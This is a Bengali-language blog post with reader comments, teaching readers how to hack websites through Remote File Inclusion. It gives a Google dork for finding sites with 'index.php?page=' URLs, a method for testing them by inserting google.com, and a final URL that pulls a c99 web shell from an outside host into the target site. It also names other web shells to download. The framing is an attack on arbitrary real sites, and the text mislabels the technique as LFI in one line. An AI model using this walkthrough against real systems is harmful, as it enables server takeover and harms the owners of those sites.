Remote File Inclusion হলো বর্তমান সময়ের জনপ্রিয় হ্যাকিং পদ্ধতি গুলোর মধ্যে একটি।
যা ওয়েব এপ্লিকেশনে পাওয়া যায়।
এই ধরনের দুর্বলতাকে ব্যাবহার করে হ্যাকার দুর্বল সাইটটির সার্ভারে ফাইল এড/যোগ করতে পারে।
যদি হ্যাকার সফল ভাবে এই কাজটি করতে সক্ষম হয় তাহলে সে সেই দুর্বল সাইটটি কে হ্যাক করতে পারবে।
এবং তার সাথে সাথে সার্ভারটি ও হ্যাক করা সম্ভব।
সাধারনত এই টাইপের দুর্বলতা গুলো এই ধরনের সাইটে থাকে যেই সাইট গুলোর লিঙ্ক গুলো এরকম হয়।
এই দুর্বলতাটি তে দুর্বল সাইট বের করার জন্যে সবচেয়ে বেশী কার্যকর google dork হচ্ছেউদাহারণঃ http://www.Targetsite.com/index.php?page=index.php
এই Dork টি index.php?page ইউআরএলের যত সাইট আছে সব গুলো আপনাকে রেসাল্টে দেখাবে।“inurl:index.php?page=”
যেকোনো একটি সাইটে প্রবেশ করুন এবং সাইটটি দুর্বল নাকি চেক করার জন্যে
?page= এর পর www.google.com এড করে এন্টার চাপুন।
তাহলে কোড দেওয়ার পর লিঙ্কটি হবে এরকমঃউদাহারণঃ www.targetsite.com/index.php?page=www.google.com
যদি মনে করেন ওয়েবসাইট টি হয় http://example.com/v2/index.php?page=index.php
যদি সাইটটি এখন গুগলে রিডাইরেক্ট করে।http://www.example.com/v2/index.php?page=http://google.com/
মানে যদি আপনি এই লিঙ্কে যাওয়ার পর দেখতে পান যে গুগল দেখা যাচ্ছে তাহলে সাইট টি দুর্বল।
যদি না আসে।। তাহলে আরেকটি সাইট খুজে বের করেন!
এরপরে।। এখন কাজ হলো হ্যাকিং শেল আপলোড দেওয়া।
শেল ডাউনলোড করার জন্যে গুগল করতে পারেন।
(madspot shell download)(wso shell download)
(b347k shell download)
Etc...
যায় হোক LFI এর জন্যে আমাদের শেল ডাউনলোড করা লাগবে না।
শেল আপলোড করা আছে এমন কোনো হোস্টিং থাকলেয় চলবে
সেটার জন্যে গুগলে সার্চ করুন।
c99 shell.txt
এখন শেল আপলোড করার জন্যে লিঙ্কটি হবে।http://www.c99txt.net/s/c99.txt (শেল লিঙ্ক)
http://www.vuln.rfisite.com/v2/index.php?page=http://www.c99txt.net/s/c99.txt
ধন্যবাদ আশা করি সবাই বুঝতে পেরেছেন।
সাইবার ওয়ার্ম।
Hack For Learn
Nice post bro....tnx a lot. :)
ReplyDeleteThis comment has been removed by the author.
ReplyDelete